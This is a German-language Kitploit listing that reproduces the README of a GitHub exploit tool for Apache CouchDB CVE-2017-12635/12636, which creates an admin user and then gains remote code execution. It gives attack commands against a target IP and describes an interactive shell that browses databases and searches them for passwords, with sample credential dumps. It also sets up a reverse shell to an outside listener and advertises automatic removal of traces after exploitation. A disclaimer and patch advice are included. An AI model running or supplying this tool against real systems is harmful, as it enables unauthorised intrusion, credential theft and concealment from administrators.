Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
couchdb-exploit — Exploitiert CouchDB CVE-2017-12635/12636 für Privilege Escalation und RCE und bietet anschließend eine interaktive Shell mit Befehlsausführung, Datenbank-Browsing und Reverse Shell. | Kitploit
Tools/GitHubGitHub/darabium/couchdb-exploit
Privilege EscalationExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubdarabium/couchdb-exploit

couchdb-exploit

Exploitiert CouchDB CVE-2017-12635/12636 für Privilege Escalation und RCE und bietet anschließend eine interaktive Shell mit Befehlsausführung, Datenbank-Browsing und Reverse Shell.

Repository anzeigen
vor 17 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 CouchDB Exploit - CVE-2017-12635 & CVE-2017-12636

Python License CVE CVE

Apache CouchDB – Privilegieneskalation & Remote-Codeausführung

GitHub stars GitHub forks


📖 Überblick

Dieses Tool nutzt zwei kritische Schwachstellen in Apache CouchDB aus:

CVEBeschreibungSchweregrad
CVE-2017-12635Privilegieneskalation durch JSON-Parsing-Bypass🔴 Kritisch
CVE-2017-12636Remote-Codeausführung über Query Server🔴 Kritisch

Wie es funktioniert

  1. CVE-2017-12635: Nutzt inkonsistentes JSON-Parsing zwischen Erlang- und JavaScript-Parsern aus, um einen Admin-Benutzer zu erstellen
  2. CVE-2017-12636: Nutzt den Admin-Zugriff, um einen bösartigen Query Server zu konfigurieren und Systembefehle auszuführen

🎯 Verwundbare Versionen

Schnellprüfung

curl http://target:5984/

If version is 1.x.x or 2.0.x/2.1.0 → VULNERABLE

✨ Funktionen

root@kitploit:~
✅ Automatische Ausnutzung – Ein Befehl, um alle zu beherrschen

✅ Interaktive Shell – Benutzerfreundliche Befehlsschnittstelle

✅ Datenbank-Viewer – Alle Datenbanken und Dokumente durchsuchen

✅ Vollständige JSON-Anzeige – Gesamten Dokumentinhalt sehen

✅ Globale Suche – Schlüsselwörter über alle Datenbanken hinweg suchen

✅ Systembefehle – Beliebige Befehle auf dem Zielsystem ausführen

✅ Reverse Shell – Eine vollständige interaktive Shell erhalten

✅ Befehlsverlauf – Behalte den Überblick über deine Aktionen

✅ Automatische Bereinigung – Spuren nach der Ausnutzung entfernen

✅ Farbausgabe – Leicht zu lesen und zu verstehen

📦 Installation Voraussetzungen bash

Python 3.6+ required

python3 --version

Klonen & Installieren bash

Clone the repository

git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit

Install dependencies

pip install -r requirements.txt

Anforderungen txt

requests>=2.25.0 urllib3>=1.26.0

🚀 Nutzung Grundlegende Nutzung bash

Simple exploit

python3 couchdb-exploit.py -t <TARGET_IP> -p

Example

python3 couchdb-exploit.py -t 192.168.1.100 -p 5984

Befehlszeilenoptionen bash

python3 couchdb-exploit.py -h

usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]

arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)

💻 Befehle

Nach der Ausnutzung erhältst du eine interaktive Shell: Befehl Beschreibung Beispiel db Alle Datenbanken mit Dokumentanzahl anzeigen db view ALLE Dokumente in einer Datenbank anzeigen (vollständiges JSON) view passwords raw Rohe Serverantwort anzeigen raw admin count Dokumente in einer Datenbank zählen count users search Nach einem Schlüsselwort in ALLEN Datenbanken suchen search admin exec Einen Systembefehl ausführen exec whoami reverse Reverse Shell einrichten reverse 10.0.0.1 4444 history Befehlsverlauf anzeigen history help Dieses Menü anzeigen help exit Beenden mit Bereinigung exit

📊 Beispiele

  1. Alle Datenbanken auflisten bash

couchdb> db

[+] 39 databases:

  1. _replicator (0 docs)

  2. _users (12 docs)

  3. admin (5 docs)

  4. passwords (25 docs)

  5. core-configuration (8 docs) ...

  6. Datenbankinhalt anzeigen bash

couchdb> view passwords

[+] Viewing database: passwords

[*] Total documents: 25

📄 Document #1 ID: user_admin Full content: { "_id": "user_admin", "username": "admin", "password": "Admin123!", "email": "[email protected]", "role": "superadmin" }

  1. Nach Anmeldedaten suchen bash

couchdb> search password

[+] Searching for 'password' in all databases...

✅ Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }

✅ Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }

  1. Systembefehle ausführen bash

couchdb> exec whoami [+] Executing: whoami [+] Command executed!

couchdb> exec id [+] Executing: id [+] Command executed!

  1. Reverse Shell bash

On your machine (listener)

nc -lvnp 4444

In the exploit

couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!

You should get a shell on your listener!

🖼️ Screenshots Exploit in Aktion

https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot Datenbankansicht

https://via.placeholder.com/800x400?text=Database+View Reverse Shell

https://via.placeholder.com/800x400?text=Reverse+Shell

⚠️ Haftungsausschluss

root@kitploit:~
WICHTIG: Dieses Tool dient nur zu Bildungs- und autorisierten Testzwecken.

    🚫 Nicht auf Systemen ohne ausdrückliche Genehmigung verwenden

    🚫 Der Autor ist nicht verantwortlich für jeglichen Missbrauch

    🚫 Nur in kontrollierten Umgebungen oder auf eigenen Systemen verwenden

    ✅ Vor dem Testen immer eine schriftliche Genehmigung einholen

    ✅ Verantwortungsvolle Offenlegungspraktiken befolgen

Durch die Nutzung dieses Tools stimmst du diesen Bedingungen zu.

🔐 Sicherheitstipps

Wenn du Systemadministrator bist:

root@kitploit:~
Sofort auf CouchDB ≥ 1.7.0 oder ≥ 2.1.1 aktualisieren

Firewall verwenden, um den Zugriff auf Port 5984 einzuschränken

Authentifizierung aktivieren und starke Passwörter verwenden

Protokolle auf verdächtige Aktivitäten überwachen

Regelmäßige Sicherheitsüberprüfungen deiner Infrastruktur

Schnellkorrektur bash

Upgrade CouchDB

sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version

Restrict access

sudo ufw allow from 192.168.1.0/24 to any port 5984

📚 Referenzen

root@kitploit:~
CVE-2017-12635 - NVD

CVE-2017-12636 - NVD

Apache CouchDB Security

Exploit-DB

👤 Autor

darabium

root@kitploit:~
GitHub: @darabium

Telegram: @darabium

⭐ Unterstützung

Wenn du das nützlich findest:

root@kitploit:~
⭐ Gib dem Repository einen Stern

🐛 Melde Probleme

🔧 Trage Verbesserungen bei

📢 Teile es mit anderen

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Mit ❤️ für die Sicherheitsforschung erstellt

⬆ Zurück nach oben

Tool herunterladen
VersionVerwundbarBehobene Version
Apache CouchDB < 1.7.0✅ Ja1.7.0
Apache CouchDB 1.x.x✅ Ja1.7.0
Apache CouchDB 2.0.0✅ Ja2.1.1
Apache CouchDB 2.1.0✅ Ja2.1.1
Apache CouchDB ≥ 2.1.1❌ Nein-